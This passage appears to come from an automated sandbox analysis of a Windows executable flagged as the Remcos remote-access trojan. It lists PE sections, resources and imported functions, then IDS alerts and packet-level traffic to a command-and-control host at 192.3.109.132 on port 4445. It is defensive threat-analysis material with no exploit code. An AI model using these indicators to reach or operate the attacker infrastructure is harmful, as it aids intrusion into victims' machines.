.reloc | 0x10a000 | 0x6da4 | 0x6e00 | f6a690fb0d6dce92cce81351a71705ef | False | 0.6305752840909091 | data | 6.686248646056259 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x111000 | 0x2d600 | 0x2d600 | 606177ff6643c04b3c3ff06504b3b48b | False | 0.08350550964187328 | data | 3.2906157676378043 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x111b78 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x111cac | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x111de0 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x111f14 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x112048 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x11217c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x1122b0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1123e4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x1125b4 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x112798 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x112968 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x112b38 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x112d08 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x112ed8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x1130a8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x113278 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x113448 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x113618 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x113700 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.12922138836772984
RT_ICON | 0x1147a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.09056016597510373
RT_ICON | 0x116d50 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.05886868209730751
RT_ICON | 0x11af78 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m | | | 0.05605263157894737
RT_ICON | 0x121760 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m | | | 0.045590708429682575
RT_ICON | 0x12ac08 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.036983911037501475
RT_DIALOG | 0x13b430 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x13b484 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x13b4d8 | 0x110 | data | | | 0.5845588235294118
RT_STRING | 0x13b5e8 | 0x224 | data | | | 0.5145985401459854
RT_STRING | 0x13b80c | 0xc8 | data | | | 0.665
RT_STRING | 0x13b8d4 | 0xe8 | data | | | 0.6637931034482759
RT_STRING | 0x13b9bc | 0x3cc | data | | | 0.4125514403292181
RT_STRING | 0x13bd88 | 0x3a8 | data | | | 0.36538461538461536
RT_STRING | 0x13c130 | 0x394 | data | | | 0.3941048034934498
RT_STRING | 0x13c4c4 | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0x13c8bc | 0xf4 | data | | | 0.5532786885245902
RT_STRING | 0x13c9b0 | 0xc4 | data | | | 0.6275510204081632
RT_STRING | 0x13ca74 | 0x22c | data | | | 0.5017985611510791
RT_STRING | 0x13cca0 | 0x3b4 | data | | | 0.3227848101265823
RT_STRING | 0x13d054 | 0x368 | data | | | 0.37844036697247707
RT_STRING | 0x13d3bc | 0x2b8 | data | | | 0.3879310344827586
RT_RCDATA | 0x13d674 | 0x10 | data | | | 1.5
RT_RCDATA | 0x13d684 | 0x2a4 | data | | | 0.7381656804733728
RT_RCDATA | 0x13d928 | 0xb66 | Delphi compiled form 'TForm1' | | | 0.3971898560657985
RT_GROUP_CURSOR | 0x13e490 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x13e4a4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x13e4b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x13e4cc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x13e4e0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x13e4f4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x13e508 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x13e51c | 0x5a | data | | | 0.8111111111111111
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
uRL | URLAssociationDialogA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/28/24-13:59:15.069542 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
03/28/24-14:01:41.205303 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 28, 2024 13:58:58.568214893 CET | 49699 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.568255901 CET | 443 | 49699 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:58.568331957 CET | 49699 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.569809914 CET | 49699 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.569854021 CET | 443 | 49699 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:58.569900036 CET | 49699 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.648184061 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.648232937 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:58.648298979 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.651829004 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.651844978 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:58.985279083 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:58.985358000 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.987925053 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:58.987937927 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:58.988179922 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:59.037343025 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:59.052023888 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:59.096240997 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:59.335716963 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:59.335866928 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:58:59.335962057 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:59.338146925 CET | 49700 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:58:59.338167906 CET | 443 | 49700 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:59:00.685031891 CET | 49702 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:00.685086966 CET | 443 | 49702 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:59:00.685189962 CET | 49702 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:00.685513973 CET | 49702 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:00.685570955 CET | 443 | 49702 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:59:00.685628891 CET | 49702 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:00.736732960 CET | 49703 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:00.736782074 CET | 443 | 49703 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:59:00.736864090 CET | 49703 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:00.737158060 CET | 49703 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:00.737173080 CET | 443 | 49703 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:59:01.044385910 CET | 443 | 49703 | 13.107.139.11 | 192.168.2.7
Mar 28, 2024 13:59:01.044492960 CET | 49703 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:01.119966984 CET | 49703 | 443 | 192.168.2.7 | 13.107.139.11
Mar 28, 2024 13:59:01.119990110 CET | 443 | 49703 | 13.107.139.11 | 192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.120362043 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.121575117 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.168235064 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547041893 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547131062 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547250032 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547375917 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547375917 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547399998 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547440052 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819756985 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819783926 CET4434970513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819860935 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819921017 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819991112 CET4434970513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.820043087 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853024006 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853066921 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853147030 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853504896 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853532076 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.161462069 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.161571026 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.162857056 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.162867069 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.163124084 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.164283991 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.212233067 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.431737900 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.431823015 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.431879997 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432012081 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432029009 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432037115 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432041883 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:14.904962063 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.068303108 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.068404913 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.069541931 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.269639015 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.628453970 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.631772995 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.791851044 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.809119940 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.869476080 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.969082117 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.969269991 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.969315052 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133673906 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133702993 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133719921 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133737087 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133752108 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133796930 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133811951 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133814096 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133827925 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133841991 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133857012 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133865118 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133865118 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133935928 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.255438089 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294548035 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294672012 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294688940 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294708014 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294727087 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294758081 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294780970 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294850111 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294889927 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294948101 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294950008 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295018911 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295068979 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295085907 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295130014 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295156956 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295203924 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295258045 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295274973 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295356989 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295378923 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295416117 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295444965 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295511007 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295541048 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295583963 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295639038 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295650005 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295694113 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295775890 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.434125900 CET8049712178.237.33.50192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.434206963 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 13:59:16.440784931 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454711914 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454751968 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454790115 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454804897 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454833031 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454862118 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454885006 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454888105 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454899073 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454914093 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454929113 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454967022 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454977989 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454977989 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454982042 CET444549711192.3.109.132192.168.2.7
Mar 28, 2024 13:59:16.455010891 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455010891 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455058098 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455060959 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455086946 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455101013 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455125093 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455142975 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455166101 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455178022 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455180883 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455195904 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455220938 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455245972 CET  4445  49711  192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.455246925 CET  49711  4445  192.168.2.7  192.3.109.132
Mar 28, 2024 13:59:16.455272913 CET  49711  4445  192.168.2.7  192.3.109.132
